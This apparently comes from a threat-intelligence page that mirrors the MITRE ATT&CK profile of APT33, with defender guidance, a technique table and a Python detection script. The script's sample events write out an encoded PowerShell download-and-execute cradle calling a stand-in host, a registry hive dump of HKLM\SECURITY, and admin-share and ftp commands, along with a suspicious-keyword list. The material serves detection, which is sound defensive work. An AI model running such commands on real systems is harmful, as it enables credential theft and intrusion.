G0064: APT33
Analyst context for executives and security teams
APT33 matters because MITRE describes it as a suspected Iranian group active since at least 2013 with reported targeting across the United States, Saudi Arabia, and South Korea, especially aviation and energy. The relationship set is operationally important: it links the group to credential-dumping, PowerShell/post-exploitation frameworks, remote access tools, FTP transfer, Exchange/Office abuse tooling, and wiper malware. For leaders, the decision value is not the name alone; it is whether identity controls, Windows endpoint visibility, email security, remote access monitoring, and recovery plans can withstand the behaviors represented by these relationships.
Executive priority
Prioritize APT33 as a threat-intelligence-informed readiness driver if the organization operates in aviation or energy, has exposure in Saudi Arabia, the United States, or South Korea, or runs environments where an IT compromise could affect operational technology. Executive questions should focus on: can the SOC prove visibility over credential theft and PowerShell activity; can IR contain compromised Windows credentials quickly; are destructive-malware recovery assumptions tested; and do audit/compliance records show controls over email attachments, privileged accounts, logging, segmentation, and backups?
Technical view
MITRE provides no official detection text for the group, so defenders should build coverage from the related software and techniques. Validate detections for Windows credential access involving LSASS memory, LSA Secrets, and cached domain credentials; command-line use of Net and ftp; PowerShell-heavy frameworks such as PowerSploit, Empire, PoshC2, and POWERTON; RAT/backdoor families including NETWIRE, NanoCore, Pupy, TURNEDUP, and AutoIt backdoor; Exchange/Office abuse associated with Ruler; obfuscated or encoded files; and network sniffing behavior where relevant. The ICS relationships for screen capture, scripting, and spearphishing attachment make OT-facing monitoring and phishing controls relevant where control-system environments exist.
Likely telemetry
- Endpoint process creation, command-line, parent/child process, module load, and script execution logs, especially on Windows systems
- PowerShell logging and administrative shell telemetry
- Windows security events and EDR signals related to LSASS access, registry access to LSA Secrets, and credential-dumping tools such as Mimikatz and LaZagne
- Email gateway, attachment detonation, and user-reporting telemetry for spearphishing attachments
- Office Suite and Exchange service logs relevant to Ruler-like abuse
Detection direction
- Correlate across aliases APT33, HOLMIUM, Elfin, and Peach Sandstorm so intelligence, case management, and SIEM content do not fragment the same ATT&CK group reference.
- Do not rely only on malware names. Several related tools are public or legitimate administrative utilities, so detection should combine behavior, execution context, privilege level, destination, and sequence.
- Tune for credential-access chains: suspicious LSASS access, LSA Secrets access, cached credential access, followed by lateral movement or remote administration activity should receive higher priority.
- Validate PowerShell and scripting coverage because multiple related tools and backdoors use scripting or PowerShell-style post-exploitation.
- Review false positives for Net, ftp, PowerSploit, Empire, PoshC2, Pupy, and other dual-use tools by comparing expected administrative baselines with unusual hosts, users, timing, and network destinations.
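The correlation the bullets above call for, as an added example that is not MITRE, FireEye or Glexia code: it tags constructed Sysmon-like events (process creation and process access) for LSASS memory reads, SECURITY/SAM hive dumps, dual-use remote administration (net, wmic, PsExec) and ftp, decodes `-EncodedCommand` PowerShell (the base64 encoding noted in the technique table) to inspect the real script, and then scores each event per host/user so that dual-use activity following credential access within 30 minutes is high priority while the same tool from a baselined admin pair is not. The hosts, users, timestamps, admin baseline and LSASS-reader allowlist are all constructed for the demonstration.

```python
"""Score Windows endpoint events into APT33-style credential-access chains.

Added example for this page, not MITRE or Glexia code. The event shape is
Sysmon-like (EID 1 process creation, EID 10 process access); hosts, users,
the admin baseline and the LSASS-reader allowlist are constructed assumptions.
"""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

LSASS = "c:\\windows\\system32\\lsass.exe"
# Processes that legitimately read lsass memory on the constructed fleet (assumption; tune locally).
LSASS_READER_ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe"}
# (host, user) pairs where net/ftp use is routine administration (assumption; derive from local baselines).
ADMIN_BASELINE = {("ADM-01", "CORP\\adm.ops")}
DUAL_USE = {"remote_admin", "ftp_transfer"}
SUSPICIOUS_PS = ("downloadstring", "iex", "invoke-expression", "invoke-mimikatz", "frombase64string")


def encode_powershell(script):
    """UTF-16LE then base64, which is what powershell.exe -EncodedCommand consumes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_powershell(cmdline):
    """Return the decoded script when cmdline carries an -enc/-encodedcommand blob, else None."""
    m = re.search(r"-(?:encodedcommand|enc|en|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev):
    """Map one event to behaviour tags; an empty set means nothing of interest."""
    tags = set()
    if ev["type"] == "process_access":
        reads_memory = int(ev["granted_access"], 16) & 0x10  # PROCESS_VM_READ bit
        src = ev["source_image"].rsplit("\\", 1)[-1].lower()
        if ev["target_image"].lower() == LSASS and reads_memory and src not in LSASS_READER_ALLOWLIST:
            tags.add("cred_access")  # T1003.001 LSASS Memory
        return tags
    cmd = ev["cmdline"]
    low = cmd.lower()
    if re.search(r"\breg(\.exe)?\s+save\s+hklm\\(sam|security|system)\b", low):
        tags.add("cred_access")  # hive dump; LSA Secrets (T1003.004) live under HKLM\SECURITY
    decoded = decode_encoded_powershell(cmd)
    if decoded and any(s in decoded.lower() for s in SUSPICIOUS_PS):
        tags.add("encoded_powershell")  # T1059.001 with a base64-hidden download cradle
    if (re.search(r"\bnet(\.exe)?\s+use\s+\\\\", low)
            or re.search(r"\bwmic(\.exe)?\b.*/node:", low) or "psexec" in low):
        tags.add("remote_admin")
    if re.search(r"\bftp(\.exe)?\s", low):
        tags.add("ftp_transfer")  # T1048.003 candidate
    return tags


def correlate(events, baseline=ADMIN_BASELINE, window=timedelta(minutes=30)):
    """Score events per (host, user); dual-use activity that follows credential access ranks highest."""
    by_actor = defaultdict(list)
    for ev in events:
        by_actor[(ev["host"], ev["user"])].append(ev)
    alerts = []
    for actor, evs in by_actor.items():
        evs.sort(key=lambda e: e["ts"])
        tagged = [(e, classify(e)) for e in evs]
        cred_times = [e["ts"] for e, t in tagged if "cred_access" in t]
        for ev, tags in tagged:
            if not tags:
                continue
            recent_cred = any(ev["ts"] - window <= t <= ev["ts"] for t in cred_times)
            if tags & DUAL_USE and recent_cred:
                priority = "high"      # dump, then move: the chain to escalate first
            elif "cred_access" in tags:
                priority = "medium"
            elif tags <= DUAL_USE and actor in baseline:
                priority = "baseline"  # expected admin use, no credential theft before it
            else:
                priority = "low"
            alerts.append({"host": actor[0], "user": actor[1], "ts": ev["ts"].isoformat(),
                           "tags": sorted(tags), "priority": priority})
    return alerts


T = datetime.fromisoformat
SAMPLE_EVENTS = [  # constructed telemetry, not real events
    {"ts": T("2024-03-04T09:00:00"), "host": "WS-0412", "user": "CORP\\jdoe", "type": "process",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')")},
    {"ts": T("2024-03-04T09:02:00"), "host": "WS-0412", "user": "CORP\\jdoe", "type": "process_access",
     "source_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1010"},
    {"ts": T("2024-03-04T09:03:00"), "host": "WS-0412", "user": "CORP\\jdoe", "type": "process",
     "cmdline": "reg.exe save hklm\\security C:\\Windows\\Temp\\sec.hiv"},
    {"ts": T("2024-03-04T09:10:00"), "host": "WS-0412", "user": "CORP\\jdoe", "type": "process",
     "cmdline": "net.exe use \\\\FS01\\C$ /user:CORP\\svc_backup"},
    {"ts": T("2024-03-04T09:30:00"), "host": "ADM-01", "user": "CORP\\adm.ops", "type": "process",
     "cmdline": "net.exe use \\\\FS01\\share"},
    {"ts": T("2024-03-04T10:00:00"), "host": "WS-0777", "user": "CORP\\asmith", "type": "process",
     "cmdline": "ftp.exe -s:cmds.txt 198.51.100.7"},
    {"ts": T("2024-03-04T10:05:00"), "host": "WS-0777", "user": "SYSTEM", "type": "process_access",
     "source_image": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18\\MsMpEng.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1fffff"},
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a["priority"].upper(), a["host"], a["user"], a["ts"], ",".join(a["tags"]))
```

In the sample run the workstation that spawns encoded PowerShell, reads LSASS, saves the SECURITY hive and then maps an admin share produces one high alert on the `net use`, two medium alerts on the credential access, and a low alert on the cradle; the baselined admin host's identical `net use` is tagged baseline, and the Defender engine's LSASS handle is ignored. Swap the regexes for your EDR's field names and feed the allowlist and baseline from observed data rather than hand-written sets.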
Mitigation priorities
- Start with identity hardening: restrict privileged access, reduce credential exposure, monitor administrative accounts, and limit cached or reusable credentials where operationally feasible.
- Harden Windows endpoints against credential dumping and unauthorized access to LSASS and sensitive registry secrets.
- Constrain and log PowerShell, scripting interpreters, and command-line administrative utilities without blocking legitimate operations blindly.
- Strengthen email attachment defenses, user reporting, and investigation workflows for targeted phishing scenarios.
- Control outbound transfer paths such as FTP and monitor unusual remote administration traffic.
Analyst notes and limits
This take is based on MITRE ATT&CK group G0064, its aliases, official description, external references, and supplied relationship context. The most useful defensive interpretation comes from the related software and techniques rather than from a group-level detection field, which is not provided. APT33 should be used as a threat-informed planning scenario, especially for aviation, energy, identity, endpoint, email, and recovery readiness.
MITRE does not specify group-level platforms, tactics, or official detection guidance for this object. Relationship descriptions include multiple public, dual-use, and cross-platform tools, so local baselines are required before treating activity as malicious. The supplied data supports historical targeting and relationships, not current exploitation, confirmed attribution in a local incident, or guaranteed detection coverage.
APT33
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1552.001 | Credentials In Files | |
| Enterprise | T1003.005 | Cached Domain Credentials | |
| Enterprise | T1560.001 | Archive via Utility | |
| Enterprise | T1555.003 | Credentials from Web Browsers | |
| Enterprise | T1552.006 | Group Policy Preferences | |
| Enterprise | T1027.013 | Encrypted/Encoded File | APT33 has used base64 to encode payloads. (Citation: FireEye APT33 Guardrail) |
| Enterprise | T1566.001 | Spearphishing Attachment | |
| Enterprise | T1003.001 | LSASS Memory | |
| Enterprise | T1566.002 | Spearphishing Link | |
| Enterprise | T1110.003 | Password Spraying | |
| Enterprise | T1003.004 | LSA Secrets | |
| Enterprise | T1053.005 | Scheduled Task | |
| Enterprise | T1555 | Credentials from Password Stores | |
| Enterprise | T1546.003 | Windows Management Instrumentation Event Subscription | |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol | |
| Enterprise | T1588.002 | Tool | |
| Enterprise | T1040 | Network Sniffing | |
| Enterprise | T1071.001 | Web Protocols | |
| Enterprise | T1059.001 | PowerShell | |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder | |
| Enterprise | T1078 | Valid Accounts | |
| Enterprise | T1573.001 | Symmetric Cryptography | APT33 has used AES for encryption of command and control traffic. (Citation: FireEye APT33 Guardrail) |
| Enterprise | T1059.005 | Visual Basic | |
| Enterprise | T1132.001 | Standard Encoding | APT33 has used base64 to encode command and control traffic. (Citation: FireEye APT33 Guardrail) |
| Enterprise | T1571 | Non-Standard Port | |
| Enterprise | T1078.004 | Cloud Accounts | |
| Enterprise | T1203 | Exploitation for Client Execution | |
| Enterprise | T1204.002 | Malicious File | |
| Enterprise | T1204.001 | Malicious Link | |
| Enterprise | T1068 | Exploitation for Privilege Escalation | APT33 has used a publicly available exploit for CVE-2017-0213 to escalate privileges on a local system. (Citation: FireEye APT33 Guardrail) |
Groups, software, and campaigns
S0194: PowerSploit
PowerSploit is an open source, offensive security framework composed of PowerShell modules and scripts that perform a wide range of tasks related to penetration testing, such as code execution, persistence, bypassing anti-virus, recon, and exfiltration.[1][2][3]
S0129: AutoIt backdoor
AutoIt backdoor is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352.[1] This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.
S0378: PoshC2
PoshC2 is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in PowerShell. Although PoshC2 is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.[1]
S0358: Ruler
S0002: Mimikatz
S0336: NanoCore
S1134: DEADWOOD
S0380: StoneDrill
StoneDrill is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with APT33.[1][2]
S0371: POWERTON
S0349: LaZagne
S0199: TURNEDUP
TURNEDUP is a non-public backdoor. It has been dropped by APT33's StoneDrill malware.[1][2]
S0198: NETWIRE
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 2.0 | | Current bundle | 8bce83bff7b0… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] FireEye APT33 Sept 2017: O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.
- [2] FireEye APT33 Webinar Sept 2017: Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.
- [3] Symantec Elfin Mar 2019: Security Response Attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S. Retrieved April 10, 2019.
- [4] Microsoft Holmium June 2020: Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.
- [5] APT33 (alias record): (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)
- [6] Elfin (alias record): (Citation: Symantec Elfin Mar 2019)
- [7] HOLMIUM (alias record): (Citation: Microsoft Holmium June 2020)
- [8] Microsoft Threat Actor Naming July 2023: Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
- [9] Peach Sandstorm (alias record): (Citation: Microsoft Threat Actor Naming July 2023)
- [10] mitre-attack: G0064
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.